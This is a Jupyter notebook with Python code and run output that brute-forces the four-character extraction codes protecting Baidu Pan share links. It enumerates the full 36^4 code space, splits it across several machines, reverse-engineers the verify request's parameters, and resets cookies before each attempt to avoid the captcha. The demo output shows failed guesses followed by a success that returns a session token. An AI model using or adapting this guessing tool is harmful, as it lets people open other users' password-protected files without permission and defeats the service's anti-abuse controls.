In [1]:
from requests import Session, Response
from requests_toolbelt.utils import dump
import base64
import time
from urllib.parse import urljoin
from pprint import pprint
from itertools import permutations


def parse_param_lines(s: str, separator=': ') -> dict:
    """Parse ``key<separator>value`` lines into a dict.

    Args:
        s: Multi-line text with one pair per line. Empty and
            whitespace-only lines are skipped.
        separator: Delimiter between key and value. Only the first
            occurrence on each line is used, so a value may itself
            contain the separator.

    Returns:
        Dict mapping each whitespace-stripped key to its value text
        (the value is kept verbatim, not stripped).

    Raises:
        ValueError: If a non-blank line does not contain ``separator``.
    """
    def kv(line):
        # maxsplit=1: a value such as "https://host/a: b" must stay intact.
        k, v = line.split(separator, 1)
        return (k.strip(), v)  # only the key is stripped
    return dict(kv(line) for line in s.splitlines() if line.strip())

assert parse_param_lines("""a: 3
        b: 5""") == {"a": "3", "b": "5"}

def b64_encode(s: str) -> str:
    """Return the standard Base64 encoding of an ASCII-only string, as text.

    Raises:
        UnicodeEncodeError: If ``s`` contains non-ASCII characters.
    """
    ascii_bytes = s.encode("ascii")
    b64_bytes = base64.b64encode(ascii_bytes)
    return b64_bytes.decode("ascii")

assert (
    b64_encode("B368A4CA85CCBF7F286652FDC4CBF7AB:FG=1")
    == "QjM2OEE0Q0E4NUNDQkY3RjI4NjY1MkZEQzRDQkY3QUI6Rkc9MQ=="
)

def get_timestamp_ms():
    """Return the current Unix time in whole milliseconds (truncated)."""
    seconds_since_epoch = time.time()
    return int(seconds_since_epoch * 1000)

# A present-day millisecond timestamp has 13 decimal digits.
assert len(str(get_timestamp_ms())) == 13

class BaseSpider(Session):
    """``Session`` subclass with a desktop-browser User-Agent and a base URL."""

    def __init__(self, base_url: str = None, *args, **kwargs):
        """
        Args:
            base_url: URL that ``join_url`` resolves relative paths against.
            *args, **kwargs: Forwarded unchanged to ``Session.__init__``.
        """
        super().__init__(*args, **kwargs)
        user_agent = (
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/117.0.0.0 Safari/537.36"
        )
        # NOTE: this assigns a brand-new dict instead of updating the headers
        # object created by the parent constructor.
        self.headers = {"User-Agent": user_agent}
        self.base_url = base_url

    def join_url(self, next_url: str):
        """Resolve ``next_url`` against ``self.base_url`` using ``urljoin``."""
        resolved = urljoin(self.base_url, next_url)
        return resolved
        

In [2]:
class BaiduPanSpider(BaseSpider):
    """Session that submits an extraction code to one Baidu Pan share link."""

    def __init__(self, target_id: str, *args, **kwargs):
        """
        Args:
            target_id: Share identifier, sent as the ``surl`` query parameter.
            *args, **kwargs: Forwarded to ``BaseSpider.__init__``.
        """
        super().__init__('https://pan.baidu.com', *args, **kwargs)
        self.target_id = target_id
        self.init_url = self.join_url(f"/share/init?surl={self.target_id}")

    def pre_post_verification(self):
        """
        [Preparation step]

        Clears the cookie jar and requests the share's init page.
        ``post_verification`` later reads the ``BAIDUID`` cookie, which is
        presumably set by this request.

        Author's note: since no captcha is triggered within three requests,
        the preparation step can be separated from the request step to
        speed things up further.
        """
        self.cookies.clear()
        self.get(self.init_url)

    def post_verification(self, code: str):
        """
        [Request step]

        POSTs ``code`` to ``/share/verify`` and prints the outcome.

        ``code`` is four characters, case-insensitive, drawn from [0-9a-z],
        i.e. 36^4 possibilities in total.

        Raises:
            RuntimeError: If the ``BAIDUID`` cookie is not present, i.e.
                ``pre_post_verification`` was not called or did not yield it.
        """
        # The cookie jar's get() returns None for a missing cookie; fail with
        # an actionable message instead of an AttributeError inside b64_encode.
        baidu_id = self.cookies.get("BAIDUID")
        if baidu_id is None:
            raise RuntimeError(
                "BAIDUID cookie is missing; call pre_post_verification() first "
                "and check that the init request succeeded"
            )

        print(f">>>\ntrying code={code}")

        query = {
            # channel, web, app_id, bdstoken and clienttype can all be fixed;
            # "fields" can probably be omitted.
            "channel": "chunlei",
            "web": 1,
            "app_id": 250528,
            "bdstoken": "",
            "clienttype": 0,  # omitting this yields HTTP 403

            # dp-logid is assembled from several pieces of information (see
            # the logid figure in this notebook); a fixed value works because
            # the server does not validate it.
            "dp-logid": 83575600200067350013,

            # logid is the Base64 form of the BAIDUID cookie.
            "logid": b64_encode(baidu_id),

            # surl is the share id.
            "surl": self.target_id,

            # t is a millisecond timestamp.
            "t": get_timestamp_ms(),
        }

        data = {
            "pwd": code,
            "vcode": "",
            "vcode_str": ""
        }

        # Referer is required, otherwise the server answers errno 2.
        self.headers['Referer'] = self.init_url

        res = self.post(self.join_url('/share/verify'), params=query, data=data)

        if res.status_code != 200:
            print("Error!")
        else:
            payload = res.json()  # parse the body once and reuse it
            pprint(payload)

            errno = payload['errno']
            if errno == 0:
                print('成功！')  # success
            elif errno == -12:
                print("验证码错误")  # wrong code
            elif errno == 2:
                print("漏了 Referer")  # Referer header missing
            else:
                print("其他验证码类型错误")  # any other error code

        print("<<<\n")
        return
                    

In [3]:
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyz'
CHARS_N = len(CHARSET)
CODE_LEN = 4  # number of characters in a code
CODE_SPACE_SIZE = CHARS_N ** CODE_LEN


def gen_code(index=0, machines_n=1, machine_cur=0):
    """Return the ``index``-th code within one partition of the code space.

    The code space (all ``CODE_LEN``-character strings over ``CHARSET``,
    ordered as fixed-width base-``CHARS_N`` numbers) is split into
    ``machines_n`` consecutive partitions; ``machine_cur`` selects one.

    Args:
        index: Integer offset inside the selected partition.
        machines_n: Number of partitions (must be non-zero).
        machine_cur: Zero-based partition number.

    Returns:
        A ``CODE_LEN``-character string. Only the lowest ``CODE_LEN`` digits
        are rendered, so positions past the end of the code space wrap around.

    Raises:
        ZeroDivisionError: If ``machines_n`` is 0.
    """
    def convert(num):
        # Fill digits from the least-significant (rightmost) position.
        digits = [CHARSET[0]] * CODE_LEN
        for pos in range(CODE_LEN - 1, -1, -1):
            num, remainder = divmod(num, CHARS_N)
            digits[pos] = CHARSET[remainder]
        return ''.join(digits)

    # Integer arithmetic only: multiplying before the floor division avoids
    # the float rounding of `CODE_SPACE_SIZE / machines_n * machine_cur`.
    start = CODE_SPACE_SIZE * machine_cur // machines_n + index
    return convert(start)

# Demo run: try the first three generated codes, then a fixed code, against
# one share. Cookies are reset before every attempt.
bdp_spider = BaiduPanSpider('TP_EEGShTgNwlieNrC89bA')

candidate_codes = [gen_code(n) for n in range(3)] + ["zhuk"]
for code in candidate_codes:
    bdp_spider.pre_post_verification()
    bdp_spider.post_verification(code)

>>>
trying code=0000
{'err_msg': '', 'errno': -9, 'request_id': 8653329481794196449}
其他验证码类型错误
<<<

>>>
trying code=0001
{'err_msg': '', 'errno': -9, 'request_id': 8653329608145071353}
其他验证码类型错误
<<<

>>>
trying code=0002
{'err_msg': '', 'errno': -9, 'request_id': 8653329774152023176}
其他验证码类型错误
<<<

>>>
trying code=zhuk
{'err_msg': '',
 'errno': 0,
 'randsk': 'kx%2FxdUsD0wXYtRhhm014gsAm4Y%2FnjLrMe7EOTVdMlIQ%3D',
 'request_id': 8653329923208940911}
成功！
<<<



## analysis

### sample data

```python
query = '''
t	1696139063798
surl	TP_EEGShTgNwlieNrC89bA
channel	chunlei
web	1
app_id	250528
bdstoken	
logid	QjM2OEE0Q0E4NUNDQkY3RjI4NjY1MkZEQzRDQkY3QUI6Rkc9MQ==
clienttype	0
dp-logid	83575600200067350013
'''

data = '''
pwd	aaaaa
vcode	
vcode_str	
'''

code_ok = {
	"errno": 0,
	"err_msg": "",
	"request_id": 8651924061006025916,
	"randsk": "kx%2FxdUsD0wXYtRhhm014gsAm4Y%2FnjLrMe7EOTVdMlIQ%3D"
}

code_wrong = {
	"errno": -12,
	"err_msg": "",
	"request_id": 8651874905547745422
}
```

### logid logic

![logid.jpg](assets/logid.jpg)